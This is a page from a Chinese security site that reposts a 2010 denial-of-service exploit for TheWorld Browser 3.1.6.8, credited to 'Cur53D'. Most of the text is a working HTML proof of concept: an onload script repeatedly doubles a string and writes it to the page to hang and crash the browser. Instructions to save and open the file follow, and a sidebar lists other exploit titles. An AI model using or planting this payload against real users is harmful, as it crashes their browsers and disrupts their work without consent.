首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TheWorld Browser 3.1.6.8 DOS Exploit
来源:Hyq6xx[at]gmail.com 作者:Cur53D 发布时间:2010-06-30  
AUTHOR  : Cur53D
MAIL  : Hyq6xx[at]gmail.com
DATE : 29,june 2010
Blog  : www.Cur53D.dlstreet.net
Type  : Denial Of Service
Platform  : Windows
Greetz  : Sid3^effects,*L0rd CrusAd3r*,D34D F0X TH3 BL4CKH4T And All My Friends

####################################################################################
The World Browser is very small utility light and fast??
* Last Updated: 2010-06-03
* License: Freeware Free
* OS: Windows 7, Vista, XP, 2000
* Requirements: No special requirements
* Publisher: ioage.com
* Homepage: http://www.ioage.com
####################################################################################
Code:
####################################################################################
<html>
<title>TheWorld Browser 3.1.6.8? DOS Exploit? By Cur53D Await the Hang and crash ;)

</title>
<script>
function junk()
{
var buff="C";
for (i=0;i<1000;i++)
{
buff+=buff+"C";
document.write(buff+buff);
}
}
</script>
<body onload="javascript:junk();">
?
</body>
</html>
####################################################################################
Save the Above HTML Code as .html and open it with the said browser to experience

the Denial Of service.
####################################################################################
#Cur53D



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux/ARM chmod("/etc/shadow",
·Acoo Browser 1.98.744 Denial o
·Polymorphic /bin/sh x86 linux
·Opera 10.54 Denial of Service
·Linux/ARM - setuid(0) & kill(-
·Netscape Browser 9.x Denial of
·Linux/ARM - setuid(0) & execve
·Internet Browser Classic (IBC
·Mozilla Firefox 3.6.6 Denial o
·FineBrowser v.3.2 Denial of Se
·Winamp v5.571 Malicious AVI De
·GSM SIM Utility sms file Local
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved